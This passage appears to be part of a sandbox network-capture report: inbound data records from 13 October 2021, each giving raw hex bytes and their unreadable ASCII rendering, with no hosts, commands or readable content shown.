2021-10-13 13:52:00 UTC	453	IN	Data Raw: 51 1d 31 b8 4c 22 c0 65 5d 1c 12 b0 32 07 3e 0f ed 9f c6 78 a5 3a a0 d6 92 0f d5 54 f6 11 80 13 cc b2 b4 22 96 dc 01 60 b2 61 9c bf 12 7b 82 e7 e4 3f 39 53 6f c6 8d 7f c4 7b 13 f7 5a b6 9c 02 f4 54 20 bb 0c 8c 79 30 27 ce 71 be 67 5f 61 22 f7 8e 52 0d ab 30 6c a9 0c 1e 87 e1 73 23 03 ca f2 8b ca 45 26 00 76 70 11 06 26 ff 06 f6 6c 32 c2 3a ef 0f 9f d1 f6 db 62 68 f2 7e e9 fd 44 a3 55 a2 17 07 1b 45 63 89 a1 c5 05 f4 dc 19 5d 93 15 19 a6 e2 ee 7e 14 12 4d 95 72 49 af e1 9a cc b4 4e 19 2d 54 ff 45 b0 49 da b6 17 87 d2 51 36 0c 26 29 69 27 29 7e b7 01 3d cb cd c7 fd 4b 36 49 1f 85 1c 21 17 f8 6f ec 8e c0 84 49 68 1d 81 a8 d2 3a ac cf 8f 2b 66 44 e5 53 5f a5 4d a9 80 ea 0a 51 5b da ff 86 32 d8 e1 d6 58 94 8d 63 05 2a 3a ac e2 2e 7f 2d 44 1f 6d 2e 91 10 34 dd Data Ascii: Q1L"e]2>x:T"`a{?9So{ZT y0'qg_a"R0ls#E&vp&l2:bh~DUEc]~MrIN-TEIQ6&)i')~=K6I!oIh:+fDS_MQ[2Xc*:.-Dm.4
2021-10-13 13:52:00 UTC	454	IN	Data Raw: 0c c6 16 07 e4 dd 2a 2e f6 4c d0 f4 50 3e 9b 2b 66 b7 22 d3 ca c0 b2 e6 19 26 62 af 09 40 12 54 26 9e 18 74 e0 d4 6a 07 ad 36 f9 7d 33 e2 27 53 c4 7b 68 a0 8b 60 24 7e 2f d5 46 3b 29 7c dd 20 31 75 40 1a bd 3c 2e fa 81 a3 8c 3a 72 44 82 f0 bf 26 6c 78 e4 ea d4 99 4d 65 29 01 d5 5e 44 28 07 bd 1b 45 63 b9 f8 f9 20 3a d4 59 86 32 73 a4 d9 e1 92 21 78 6c f2 07 71 05 4b 23 b0 e3 af 3c aa 16 73 4a 63 00 ec 8d b7 59 d2 23 41 6e 02 19 ec e7 f7 6d 08 10 5c 58 ba 68 06 0f b7 d4 f5 22 60 5e 4e 43 fb 54 28 86 e6 f1 c6 43 ae 35 90 0c 49 ba f3 aa 3b 09 33 cc 58 74 ed f6 16 e7 cb df 80 c2 4c 84 fc 0c 78 b0 fc a3 4a 74 8b bb bd 88 27 52 14 29 26 3c 6c fe ef e0 07 bd ba 88 6a d6 ec 08 ac 59 d3 3e 44 3f 51 5d e6 1c 08 c2 a3 23 fc 20 24 8b 18 0a 52 b9 c5 70 96 21 1b 7d 42 Data Ascii: *.LP>+f"&b@T&tj6}3'S{h`$~/F;)\| 1u@<.:rD&lxMe)^D(Ec :Y2s!xlqK#<sJcY#Anm\Xh"`^NCT(C5I;3XtLxJt'R)&<ljY>D?Q]# $Rp!}B
2021-10-13 13:52:00 UTC	456	IN	Data Raw: 4e 03 09 77 c4 39 08 cd 1e 6b f7 e5 fb c2 8f fe 1d 53 41 03 ae e3 a5 63 73 2d 85 52 60 66 99 4d ee e5 bb df 19 d5 34 b8 fc 9e dd 57 9d 99 8c ae f2 f0 60 8f 68 e7 01 f0 38 3d d5 fa 41 e2 8b 4c 2c 1a 1e df 8a b1 53 c5 ee a5 6a 5a da cf 88 43 5b 0e d9 fe 71 cf 24 36 78 3e 56 e8 6d ea e4 a8 87 ba 57 12 98 7f b6 c7 2e e6 81 14 56 b6 a3 82 03 d0 a6 0d 41 46 e2 30 94 3b 6d 2d b6 85 0b e8 1d e1 b5 e9 6e c1 ae 23 d0 11 f8 c7 70 f2 59 21 df d0 93 54 50 5e 44 48 e6 e5 68 eb 53 9c ef 6a af 0b ce 79 ef 1e b4 a9 8d 58 24 8a 70 82 05 90 b9 9a 9d 73 33 d0 c8 20 ea d9 d5 9f 80 6d 1c 87 4f 39 f8 16 e7 e3 3f a8 28 c9 c7 f3 17 3a c9 bb 38 48 6e 1f a5 ab aa b9 3a 7f 6f 0e 61 ea 42 19 7c 8d 5c 5c a1 81 a9 4b fa 19 48 7c 7f ae 24 bf d2 c6 66 26 ff 88 63 b7 b3 c0 d5 b6 a1 31 9f Data Ascii: Nw9kSAcs-R`fM4W`h8=AL,SjZC[q$6x>VmW.VAF0;m-n#pY!TP^DHhSjyX$ps3 mO9?(:8Hn:oaB\|\\KH\|$f&c1
2021-10-13 13:52:00 UTC	457	IN	Data Raw: 7f ea fb 69 67 a3 89 2e 93 97 2f 6e ee c1 61 ba a6 d4 c1 13 e6 0b 03 da 5d 7d 51 d9 14 96 74 96 1e 0a 40 9a 84 80 77 4b d8 5f 17 0a dd f5 7f 5d 84 c2 93 29 ba 5c 33 0f b7 23 14 9a c8 bf be ff d0 a1 39 84 27 42 2b d2 64 4a 15 e3 3c b1 8e b9 58 e5 4a c0 05 b7 32 3b 64 03 6b 67 78 1d 78 f4 9f 86 27 44 d3 3c 56 7c bf 54 8e 0b 1f 37 84 4e a7 e1 72 36 ad 0a 44 0a 30 c3 68 cd 9b ec 91 6d b2 6c 39 c7 4c f6 28 bd ac 36 7f fd 3c 4d 54 33 69 9f f9 34 c8 37 ec 2a 38 6e 70 c8 de 11 67 98 dd 72 82 f9 ec c8 38 82 67 7a c6 e5 70 34 f6 f4 2b 3b 1a 58 c2 3c d1 66 5d 92 f7 57 89 81 93 f4 ec 7b 40 9f 40 0a 9d da 60 b4 53 4e a9 84 2a 64 b3 b9 ab ff 22 f4 f4 39 fd 06 66 1e e3 d0 c5 c3 42 bb 5f be dd 03 6b 25 3a 0c 84 c8 75 16 25 0f ed a8 e6 63 e2 81 82 25 84 47 a1 5b ea a8 17 Data Ascii: ig./na]}Qt@wK_])\3#9'B+dJ<XJ2;dkgxx'D<V\|T7Nr6D0hml9L(6<MT3i478npgr8gzp4+;X<f]W{@@`SNd"9fB_k%:u%c%G[
2021-10-13 13:52:00 UTC	458	IN	Data Raw: 41 a8 66 46 c9 2b ff b5 b6 23 36 ee 35 d8 b1 8e 94 de 9b 51 b8 e9 2a 93 78 53 ac 6f a6 18 7a 3c 78 44 08 8d 93 a1 54 83 1a 1a 1d 17 b1 d8 25 10 6e 6e 71 3f 4f 75 c9 36 0f 78 55 d8 ac 1a 0f 5b 2d 6d 0e 4a f0 17 65 c3 fe a4 38 60 0b 0f b9 ac b6 99 28 a7 6e 8b a3 91 7e 2f 07 88 22 e4 34 ab 1c e1 1b f8 84 b2 52 8d 43 e6 b5 a6 a2 9c 11 09 1c d9 ed 68 39 ca d1 a4 4e b1 c3 c6 c7 d1 e3 bb 45 9d b5 06 28 dc 6b cb f1 34 80 46 37 b3 e7 dc 6e d8 ff c7 79 68 ea b5 01 17 d6 5b 25 c0 e5 c9 34 27 64 8e 8a 54 f3 78 cd c8 ac 5b 66 4d 47 ea fc 69 c4 5a 49 a7 03 4c 93 dc c4 f8 c3 58 f4 68 4e 96 2a 42 c7 d1 2f 30 ee fa 80 af 76 17 03 b5 35 cb cd f7 96 7a 3a 04 3f 70 de ba 22 a1 0d 30 1c 79 70 4c 32 fc 24 bc 57 a3 f8 c1 91 8b bb 64 0f bc d2 da 29 62 dc c6 9e 3a 94 3f 67 c2 50 Data Ascii: AfF+#65QxSoz<xDT%nnq?Ou6xU[-mJe8`(n~/"4RCh9NE(k4F7nyh[%4'dTx[fMGiZILXhNB/0v5z:?p"0ypL2$Wd)b:?gP
2021-10-13 13:52:00 UTC	459	IN	Data Raw: 90 40 c1 de 41 ee 5c af 84 32 39 4f 94 59 01 3e 68 3b 6a 5d 5e 27 42 cb 14 14 6a 8c 9a 7c 29 ce 15 77 c2 9e 6a 0e ae 81 d4 6d dc 1c ed 6d c4 ef ef ca f7 11 fd 51 69 9b cc 92 e5 b7 49 9e 1a 23 38 6a ad cf dc 90 08 89 bb 38 57 4c 53 65 98 57 a9 51 84 7a 14 b5 53 be 3b 0f c2 b9 27 f8 9b d8 fa 0a 56 d6 b7 f7 87 d8 17 70 3a 0a 9d 5f cd 49 bd d1 0a 61 43 ff 89 9d 56 d0 84 a9 27 1f bb b6 e0 57 15 24 a9 6f bb de f4 8c da bb 61 b8 14 73 e9 18 a4 1c 80 32 f2 9c 68 22 c0 3f a0 f2 eb 33 95 9e 60 4e b8 5d f6 92 be d5 b4 aa 97 52 1e 09 0a 7c ec 2b d0 c3 ca 15 b3 f5 3c 96 a4 9c 19 bc e1 36 79 08 2c 62 97 90 e9 66 fd d9 7b 8f 1b bf 55 c0 a5 e9 b2 34 51 80 2f fd 1c e9 80 f4 1c d6 74 e4 7a 06 8a ef eb 37 9a 5d 3e b6 1b 6f c4 75 36 da 61 bc b8 3f 4e d3 ff 6b a8 d4 5b d6 93 Data Ascii: @A\29OY>h;j]^'Bj\|)wjmmQiI#8j8WLSeWQzS;'Vp:_IaCV'W$oas2h"?3`N]R\|+<6y,bf{U4Q/tz7]>ou6a?Nk[
2021-10-13 13:52:00 UTC	460	IN	Data Raw: 49 70 b8 0b 89 e7 85 d6 89 02 52 ed a7 44 27 3c 1d 37 df 3b 3a c0 14 92 b9 fa d8 10 22 36 62 2b e0 d8 bb 15 05 32 fa d8 df 26 6e d5 fc 66 ca b2 00 e5 6a 68 de 20 ed b5 cd 03 9f 7e 0d 43 b7 56 e1 03 a5 57 7f 61 c2 28 25 e0 20 42 5e d7 24 d1 59 a1 07 92 c9 ea 60 e8 0d 85 b0 e2 71 90 16 e7 ef d5 ef 16 7a 5c 71 36 aa 03 26 a6 21 75 67 11 c7 e6 99 13 b1 4e 45 61 3c 93 91 41 8d ba 38 a0 93 a1 62 43 ee dc dd 63 b9 e2 d9 d7 23 c5 fc 9a 7d 99 75 a5 e2 9d b6 95 6f b6 7d a9 1b a9 21 25 73 61 04 db 73 71 e7 87 a4 cb 50 c4 9c 33 d4 85 a9 17 25 8f ab 65 e6 03 a3 5f bc 73 3d 82 7e d9 c6 5a 4b d8 cd c7 9d b8 69 90 38 78 69 d9 a6 03 3f a9 64 97 28 6d ed 11 c0 46 ad cb 5c 64 e6 5b 46 ff 62 7f 53 a1 01 d2 1a 90 78 0e 6c 7b ac 7b 51 60 ce 51 a2 71 03 00 3f 74 96 29 3f 40 35 Data Ascii: IpRD'<7;:"6b+2&nfjh ~CVWa(% B^$Y`qz\q6&!ugNEa<A8bCc#}uo}!%sasqP3%e_s=~ZKi8xi?d(mF\d[FbSxl{{Q`Qq?t)?@5
2021-10-13 13:52:00 UTC	461	IN	Data Raw: b9 74 d4 ef 21 d8 63 cf 0d fa 42 46 3a 8a 19 4c b5 24 b1 f1 84 77 4b 0e 55 c4 1e 58 eb 77 42 41 e1 43 bb 24 c8 86 d9 b7 fe b7 09 47 6c 9c fe b3 96 e5 b8 6e 46 5a 5f 3f e1 5c bf 9b 1f bc 69 20 b9 66 48 c7 1f ec 08 ff 4b d2 3e 4a be c5 8e 30 c8 a6 6a 2e 5b 63 e2 6d 9e cc ac 9c 9d d2 f9 c2 c9 22 00 79 df 6a 4d 2d 3c 48 35 26 f2 27 a2 82 58 d4 3f fe d7 5a 21 d2 d9 49 22 4f 75 28 28 31 a4 fd db f8 03 61 b7 86 9f ac 7a 76 e4 b9 d9 3b 0d 7a 99 81 d8 65 6e 8b 89 01 05 de ce 7c 74 22 9e 53 5b a6 e6 80 f4 1b c0 ba 97 80 a5 e6 3c b2 7e fa b7 be e8 24 06 25 fa c8 47 97 23 c6 30 1b c7 62 10 e4 cd 4e 6a 21 0a 59 d9 31 db d9 1c f4 41 f3 11 65 13 52 20 46 59 5d 17 6e e5 ee 77 f0 b3 10 68 ab dc c3 cd 3d b9 c3 0c 0b 77 8a 4f 0c ab 8a d1 b8 76 80 a9 05 c1 ee 25 a2 92 8a 4f Data Ascii: t!cBF:L$wKUXwBAC$GlnFZ_?\i fHK>J0j.[cm"yjM-<H5&'X?Z!I"Ou((1azv;zen\|t"S[<~$%G#0bNj!Y1AeR FY]nwh=wOv%O
2021-10-13 13:52:00 UTC	463	IN	Data Raw: ea 09 49 a9 21 56 ba 25 4d 14 8d 40 54 d6 2c 63 b3 52 fe 03 f8 d9 ff 5a 3c ad dd 48 28 ba af e0 46 eb 4d b6 c6 d7 45 f1 15 6d ac 22 b9 4c 0e 91 d9 62 55 6a 3f 8b 0f b0 08 b9 4d 6e b3 72 75 cc e9 64 63 24 8f 5d 0a 01 16 b4 81 f8 71 51 dc 19 46 4c fd d9 24 61 b1 65 53 c9 40 09 e7 65 b0 f5 b6 99 bc 9f bf 32 55 73 a9 90 c8 1d 4e a4 38 67 e9 79 be b7 82 72 1e 82 db fd 5d 60 9c 5a 1e 87 0d 58 b3 a9 ee e7 6f e5 a7 4d 61 28 db 5f fa 9f 82 ed 72 96 47 84 54 52 84 2c 82 50 9c e9 c1 46 a2 3e 38 0f e7 f7 c9 68 14 a7 03 3e b9 9b 77 0e dc c0 74 39 03 90 e6 b7 69 5f 0b 46 b8 bb 7c bf f8 7a 2d 32 13 8d 76 1e 9a d2 ce 87 7f 2a bc 83 94 83 41 e8 90 a7 7a a8 f6 c3 0a 0a 19 df b1 3b 7d c4 7f 53 2f 2d 3a 72 57 43 ac 1b a5 18 a5 d6 b6 b8 71 00 ad db 60 d5 33 fa ae 7c 46 43 ab Data Ascii: I!V%M@T,cRZ<H(FMEm"LbUj?Mnrudc$]qQFL$aeS@e2UsN8gyr]`ZXoMa(_rGTR,PF>8h>wt9i_F\|z-2v*Az;}S/-:rWCq`3\|FC
2021-10-13 13:52:00 UTC	464	IN	Data Raw: f5 f2 29 e0 bb 86 18 10 4f 83 d7 28 f1 74 0e 52 e8 80 81 14 bc a8 f6 87 03 b5 d7 4c 38 30 07 55 6b 6e e8 ed 52 a7 75 21 4f b5 e9 67 b2 c1 16 78 25 60 09 22 19 38 f8 49 f1 7c e8 1e ea 65 28 56 ef 28 bd 0b 8d ac 9a 3a 02 e7 8e 95 a1 f7 06 27 34 7b be 20 73 f3 a2 c3 31 ae 74 84 85 f3 2a ba 7a d8 64 c6 27 95 61 4f e9 d2 3b e5 46 ad 43 f4 c0 6e 1b f6 e2 ed 1d 77 ac 8b 77 30 65 f8 08 64 70 e3 e6 3b 1f 47 df b0 44 80 27 d2 93 80 c7 14 41 32 19 0f e0 bc b5 72 c6 d2 dd 15 5c 2b 7d da 51 21 ba 6c 6c df cf e0 f2 5b f1 be a8 35 85 0b 8d 64 4c 28 30 cf 98 98 14 6e 12 57 11 d1 e1 63 cc 56 d8 ba 5e 70 57 51 d5 b2 ed fd 52 45 bf c1 62 80 15 f5 2f ca a4 f8 41 60 0a 82 66 43 7f 15 cf 51 b8 df 57 0b b3 71 a9 e3 05 df 93 4e 86 79 f4 c8 18 95 22 37 f2 43 f0 17 83 a3 60 12 f2 Data Ascii: )O(tRL80UknRu!Ogx%`"8I\|e(V(:'4{ s1t*zd'aO;FCnww0edp;GD'A2r\+}Q!ll[5dL(0nWcV^pWQREb/A`fCQWqNy"7C`
2021-10-13 13:52:00 UTC	465	IN	Data Raw: a3 d4 b6 f6 83 b8 df 44 31 9b 8c bf ae 3c 3b bc 7e c7 bc d1 98 2a a8 63 64 28 92 49 1d 61 9b 13 f9 bc 08 26 de 71 30 95 72 c0 8b c0 73 27 7f af a0 7f b5 76 6f 44 75 9e fc 45 c9 47 33 06 b6 0f 74 16 49 4a 95 0f ad 69 d8 38 09 b1 ac b6 b3 fa e4 26 6e 91 b3 4d 71 82 4d 36 16 ff 51 2b d5 c0 d2 8a f6 d6 e6 b7 cf c2 91 ac f7 9c df 4a e4 19 56 2c e4 33 d4 8a 1a 52 96 18 44 24 70 e5 9e a6 15 96 e9 01 79 ab b4 2b 7c 8f 86 80 ae fb 2b 00 14 cb a1 22 17 ef dd a5 70 18 f8 b2 5f 07 c3 31 3f 10 72 ab b1 26 d5 63 18 d4 ee fd 2d f0 58 e1 5b 27 be 33 fc 27 fa ce 87 1b fa 8f 7d 41 22 62 0a e7 68 c4 7d 23 f3 90 ea 72 32 66 1c f6 2b f8 46 57 29 6e 64 d2 a4 f7 4a 82 07 aa 63 d7 14 05 d1 5d 58 53 5a 9b 4d 67 fc 5b 2c 41 e9 c7 ec 4a 98 de 38 8c 01 c5 55 b6 dc d1 66 a2 a2 5e 73 Data Ascii: D1<;~*cd(Ia&q0rs'voDuEG3tIJi8&nMqM6Q+JV,3RD$py+\|+"p_1?r&c-X['3'}A"bh}#r2f+FW)ndJc]XSZMg[,AJ8Uf^s
2021-10-13 13:52:00 UTC	467	IN	Data Raw: 21 d2 ce c2 17 73 18 c6 f8 92 47 b7 57 01 4c 44 cd 27 ac 19 7c eb af e1 2c ea 44 8e f8 3b d0 7d 48 5d 2e e9 a2 dc a3 28 6c 67 69 fa e1 79 86 72 16 64 71 32 fc ce 4b 83 2f 7b dd 47 e5 25 4d 3e a3 0f 5e 9f ea a5 21 e7 f5 e8 b0 a6 76 6d 0f 79 9e ed d9 87 86 a1 09 01 15 05 7e 87 2e 40 a3 57 2d 8a e1 b8 01 3a 72 a7 95 d9 b9 8f 73 75 56 66 de 9c d7 09 18 58 b1 44 73 f0 3c 3c 79 a6 7f 52 f6 bb 14 07 60 42 78 bc e3 a0 be db aa e3 72 33 c1 74 f3 9f 52 fc 15 e6 d8 1a 02 d6 15 c3 69 ad 58 0c 02 2d 07 ff 69 a0 73 9d 80 8f 92 2e cf 66 cb 40 31 57 a7 fe cf 0f 10 8e cc a2 ff a6 60 b5 08 d2 ec 11 da f4 3b 31 d8 6c f5 37 97 79 50 fe d2 6e 08 ea 75 17 30 33 83 ad 0b 27 d3 83 74 fd bf 0f b4 80 e7 71 fe 6a bf ce e9 99 ac 52 9d 14 1d a8 4f 52 36 d7 da d3 0f 96 65 92 95 c1 7c Data Ascii: !sGWLD'\|,D;}H].(lgiyrdq2K/{G%M>^!vmy~.@W-:rsuVfXDs<<yR`Bxr3tRiX-is.f@1W`;1l7yPnu03'tqjROR6e\|
2021-10-13 13:52:00 UTC	468	IN	Data Raw: 20 cc c3 d9 8f 43 d4 09 d5 13 79 52 8a 81 a0 4e 0d a6 f4 5c 07 ed ac 53 d4 06 3d e4 7c ea ff 5a e8 d8 6d 69 16 af 6f 9d 76 49 da 9f e8 14 ea 52 84 1e 13 38 19 5d e7 cc 97 8a 17 82 73 6e 9e 27 34 be 76 71 77 0a d0 60 67 6d 18 cc 34 9c de 3c 2a 46 41 ae 8f 3b 14 49 7f 4b 87 44 7f 6e fc f4 0f 9d 61 e0 4d 8b 43 a1 aa b0 5c c2 cf 94 62 34 b6 46 34 70 d6 c7 a6 16 a1 31 a6 7b 8d 85 f3 50 8a 72 40 f4 11 17 66 6c 42 74 98 04 29 7b 9c 50 41 9e be 40 e4 5e 1b e3 16 60 b5 60 42 e3 5c 04 b5 73 b9 8f 39 f3 1e 98 7a 51 65 02 ae d6 b5 c0 4d c1 28 2c 4c 94 57 6a cf a8 c7 9f 24 01 2f 57 d2 33 56 7c 59 50 54 5c 57 84 7a 5b 96 40 5e e6 12 ca 72 c5 90 1a 6d 7c cf 1b c9 29 f0 87 e6 f6 2c 71 4a d2 f1 28 46 51 92 9f 15 3e 88 dc 24 d6 35 ce b7 a8 d8 d3 c4 05 79 70 d7 65 85 4d 22 Data Ascii: CyRN\S=\|ZmiovIR8]sn'4vqw`gm4<*FA;IKDnaMC\b4F4p1{Pr@flBt){PA@^``B\s9zQeM(,LWj$/W3V\|YPT\Wz[@^rm\|),qJ(FQ>$5ypeM"
2021-10-13 13:52:00 UTC	469	IN	Data Raw: 2e c8 cc a1 46 47 84 7a d4 01 e7 63 9d ad 72 cc b9 60 f2 bd ec ac a7 2c 04 25 18 6f 4f 08 ef 71 55 a3 44 e4 20 c7 3f 57 96 78 67 e0 d1 da f1 b3 45 5b 66 4d 1a 71 68 8d ca 16 1f be d3 35 64 8b 28 47 1e 3c 48 ec 41 e3 90 89 13 8e 5b 10 d2 8f 37 db c2 af f9 29 e0 60 59 0c 55 f8 a0 08 03 2a a8 e6 dd 29 c9 80 de fc c5 a0 01 3c 79 7f b7 61 11 68 25 28 87 f3 25 bf 02 fc b6 8f 01 7a b8 18 93 b5 72 03 05 3f 4e be b8 7f 4f 82 41 37 85 0a e5 0e cb f6 3c 04 8a 01 3f f4 ec b6 9f 89 62 2d a9 93 79 d8 96 a5 31 90 4c ce d6 5d a9 a2 92 4a cd ed 9a 14 47 59 ba 66 71 8d a4 f8 30 a2 4e 13 68 d3 45 63 37 76 35 43 24 28 31 cb 81 0c 7a 2c d5 93 58 8e 35 23 fc 89 c0 50 b6 b6 a1 73 e4 6d c9 44 02 6d 08 dd 09 61 01 91 51 f2 4c 88 f3 af 1b 98 df 44 e8 e6 93 e3 8c 48 58 79 6e 3e fa Data Ascii: .FGzcr`,%oOqUD ?WxgE[fMqh5d(G<HA[7)`YU*)<yah%(%zr?NOA7<?b-y1L]JGYfq0NhEc7v5C$(1z,X5#PsmDmaQLDHXyn>
2021-10-13 13:52:00 UTC	470	IN	Data Raw: 2d a3 0a cd d1 0e a3 66 22 2f f1 32 29 c7 fd 10 67 06 41 28 55 3c 35 55 78 af 29 89 3c 09 98 b6 95 09 17 3e 9b 1c 4e 00 06 3a 2e b4 0f 60 9b 12 d6 c5 e1 cc 00 55 e2 98 20 54 e3 75 3d 70 ca 38 b1 40 f1 c0 dd ce 6d ac 61 d2 78 59 19 1c ad 06 5c cc a5 96 b6 6c ae 97 2e 1d 35 19 e6 ec d9 c7 67 14 a7 d3 4d 5f af 08 4c b1 f6 af 40 8b a0 c2 d7 10 35 1d 69 1f c0 78 8c 82 2e 7f eb c9 59 18 d4 df 2e b0 55 4f b5 36 9b 4c 6c ee 19 cb 59 f9 ac 86 36 66 93 41 54 87 5a a9 df 70 1a a1 44 23 b0 56 0d e3 cc b5 24 b1 c1 8f e9 88 0d 1f ea f7 39 2e 56 9f a9 9b 1f 62 fd 6e ea ac 2a db 4a c9 1b f7 21 08 e8 b5 7d ba 88 25 42 b7 74 db c6 83 df 3c f7 c2 d5 2a 18 3c f6 42 42 d7 52 bd 98 24 74 61 cc fa 31 39 91 f4 a8 17 a1 8a 3a ed 35 77 65 df 74 d4 99 d0 67 8a 45 65 d4 9c c6 d9 c2 Data Ascii: -f"/2)gA(U<5Ux)<>N:.`U Tu=p8@maxY\l.5gM_L@5ix.Y.UO6LlY6fATZpD#V$9.VbnJ!}%Bt<<BBR$ta19:5wetgEe
2021-10-13 13:52:00 UTC	472	IN	Data Raw: 96 5d e0 3f 8d 86 76 24 55 e3 10 ee 37 64 18 f5 e5 4d 5f 6b d5 be 11 a7 3e ed dc 2a 03 d0 db 39 d3 37 6b 60 32 fd 44 3b 3b a0 ec 7f 58 36 44 01 93 80 76 96 64 b0 41 1c b7 1f 13 8e 5f aa 03 f4 45 58 37 a3 e9 7b f7 76 38 7e ae 0b 98 04 87 8e 5f d4 58 99 49 73 14 88 f5 ed 9d 3f a8 5d 3c 5e ca a0 7a e6 37 a7 fd 50 e2 16 a1 47 3a 4c fa be c0 5d 12 04 ff 03 b4 9d b5 2c 41 7e d7 82 0f b5 c5 64 54 8b 29 8c 7c 72 3e 65 24 10 36 08 02 e1 ca 45 68 45 dc 3e e5 1b 9e 44 10 18 e2 dd 46 47 83 dc f2 76 2e d7 4e c4 cb 98 fa b6 e2 6c 28 e1 6c 34 86 50 aa b4 8c 4c dd b9 53 a8 2b d0 4a f2 66 5c f0 58 3a 4c 7a 79 6a 7d 20 99 67 e0 4e f7 57 03 d4 49 3d d5 07 be 65 06 1c 2f 9c ef d8 cc 95 0b b7 c6 a5 09 ab 1f ca 9a 43 7c 32 d3 46 82 32 f5 ba 4f d1 35 01 97 e7 46 ff 3a f9 b5 3b Data Ascii: ]?v$U7dM_k>*97k`2D;;X6DvdA_EX7{v8~_XIs?]<^z7PG:L],A~dT)\|r>e$6EhE>DFGv.Nl(l4PLS+Jf\X:Lzyj} gNWI=e/C\|2F2O5F:;
2021-10-13 13:52:00 UTC	473	IN	Data Raw: 94 ec 04 99 f8 1d d2 4b 2e 11 23 e1 4b 84 cf 90 20 a8 4f d9 92 37 aa 0d e0 f0 86 6a 52 da d7 f4 d9 eb 0b b2 a6 9b b6 ad 88 c4 53 08 50 99 6c e4 7f e5 80 0a f6 0a 7b 45 89 b3 58 99 84 3e 5c bd c4 f1 e9 e6 6c 46 13 1b 6e 66 40 53 9e 78 d9 b7 8b a7 6b 7b 8f 43 cc fa cc f2 9a b5 d2 fc dc e8 23 36 6f 66 34 66 58 98 5b 7a 2a 44 77 dc 22 6f 05 7d 2a f9 72 5a 91 c8 af 83 dc 0f 9c 19 68 35 29 c0 a6 8f 08 e4 74 eb 46 65 a8 48 56 0c f7 4e 33 79 df 4a 29 1c 10 95 0e 16 68 2d 87 b0 68 24 a3 a0 14 19 7e b7 e8 3c 8c 97 2f a3 76 c3 b7 de ba 62 1f 5b 88 50 0a f3 e3 7d 76 6c 92 0a ea e0 53 6c 6d 6e a1 39 f8 3b 54 1c 0b b1 00 d5 b9 3a 8f f3 f1 30 85 7f 3d 58 e0 62 b8 d5 7d cf 05 24 45 01 f1 5e c7 34 ed 19 4b ca 39 a0 95 9e 92 15 62 6e b5 6e 0e d2 e0 a5 01 95 5e 81 ad 90 a1 Data Ascii: K.#K O7jRSPl{EX>\lFnf@Sxk{C#6of4fX[zDw"o}rZh5)tFeHVN3yJ)h-h$~</vb[P}vlSlmn9;T:0=Xb}$E^4K9bnn^
2021-10-13 13:52:00 UTC	474	IN	Data Raw: 36 c9 00 bd 4d fe 09 ae c6 9c df d1 76 84 72 e8 81 f4 f3 df b7 80 a7 9e 1e 2d 21 43 63 ce e7 f0 7c 5d 6d 38 f0 6d 80 85 52 26 87 96 39 7c 06 c9 de bd 09 0d 87 2a 8a 66 18 3e 9b 19 98 59 6d 4a 6b 91 44 4c 4b 78 39 de 8b 6d 44 5b 4f da 4a 01 ae 42 c1 22 06 4c 59 be 23 55 d0 46 ec b0 4f aa d9 f2 a5 4c a6 f7 da 4a 67 51 c8 e9 26 e1 4b bf ac b1 ab 04 56 86 e9 0d ac 21 19 2d 3a b0 89 48 27 89 68 32 7c dd ed 17 0f da d7 35 b0 d2 f9 6d 2d 84 2b b2 b5 05 5a b0 79 0c ce ec 2d 88 f5 7a 1b d5 21 df a5 78 eb fa 77 f2 8b 8b 4d 7b 48 7e 3e 4f fd 3b f3 92 4a 47 77 11 e6 26 05 49 54 fa bc 3e da 5b c7 6a 4e 6a c1 d2 2b 5a 08 f2 00 76 9c 53 d0 d6 c3 3c 6e e4 aa 95 77 c9 0c 10 c1 06 af ef 69 5c c9 67 b9 41 17 35 d4 67 0a 47 ea f3 7f 46 91 1a e5 36 27 53 f8 ba b1 88 6f 2b 4b Data Ascii: 6Mvr-!Cc\|]m8mR&9\|*f>YmJkDLKx9mD[OJB"LY#UFOLJgQ&KV!-:H'h2\|5m-+Zy-z!xwM{H~>O;JGw&IT>[jNj+ZvS<nwi\gA5gGF6'So+K
2021-10-13 13:52:00 UTC	475	IN	Data Raw: 0c bc 66 e0 48 e8 4c 22 b7 b3 93 2e 2b c6 f6 f5 96 36 ae 7b 1f 48 06 f3 50 f6 ed 20 df a6 4e 4b 4f 86 b1 de b7 ab d9 49 df b6 78 26 82 b8 90 95 10 95 be 4d af 64 38 b7 11 19 45 14 69 99 41 57 21 74 80 69 84 b6 7f db 59 30 bf dc fc dc 3f d2 34 b1 f7 68 e4 f8 07 b8 e0 21 a0 ff fa 14 25 09 ff d5 ed 10 31 a3 52 46 fe 1c 40 99 16 68 68 47 d2 b3 13 06 48 54 0f 92 6d 30 da bf c4 a4 55 f3 3d a5 bf 13 35 93 40 0a ec 60 1d d2 9d a4 db 3f 33 f4 b9 ab d0 f8 0a ca 13 d7 65 3a 5e 6b c8 1c 20 80 f4 5f ce bb be c9 7e 7f 44 6a 1e 72 3a 56 28 32 f5 fd 25 1d 1e c0 41 8b 21 a1 80 83 07 3b 03 12 62 cc 64 fa 89 d3 5b 3e 7c c9 b6 72 83 ef ac d0 7c 84 18 b2 6a 52 0c 4c f4 c6 5f 69 7b 67 a8 68 58 58 27 73 6b 11 4b 92 6b ba 45 25 60 55 ed c5 48 34 dd d7 db e1 f0 eb 65 fd c0 6a 33 Data Ascii: fHL".+6{HP NKOIx&Md8EiAW!tiY0?4h!%1RF@hhGHTm0U=5@`?3e:^k _~Djr:V(2%A!;bd[>\|r\|jRL_i{ghXX'skKkE%`UH4ej3
2021-10-13 13:52:00 UTC	476	IN	Data Raw: 03 05 4c e5 d1 d3 c9 a1 80 52 28 04 fe 33 10 dd 29 89 4e 84 8c 20 a4 e0 23 d1 5e 12 3e 84 37 5c 4d 7e df 4f dd cd b9 12 8a 38 e0 a5 9b 5f 96 13 d7 b8 58 cc 95 72 46 c3 1b d8 c9 7b fc b5 21 73 cd a9 0d 48 aa 44 55 e9 e8 72 ec 06 b5 c6 3f b8 eb 77 43 da fa dd f4 fc 1b db 53 0c 54 24 32 d4 ee dc cb 5d b0 6d ae c2 e0 f9 62 35 50 19 f1 0f bd 31 fb 9d 51 a3 ee dc c5 33 6b cd d2 61 dc c7 1d 2b 02 57 ce 02 be 11 aa fa 0d 50 2c 02 3d bf 0c 52 4a 47 e7 f7 4c b4 17 0e 99 0d 84 03 d4 96 3b da 1e ff 24 b3 8d 61 42 60 9a 97 23 3e e3 73 76 a5 22 7b 43 27 c1 4e e5 5d 94 36 d5 ec 6d 1a d1 b7 2b 6f d7 f8 c2 d9 08 fd eb 86 fc 6f 51 d1 0b cd 33 0b 93 a5 94 60 ae 89 1e b4 12 a6 da 72 f5 fa db 1b 4b 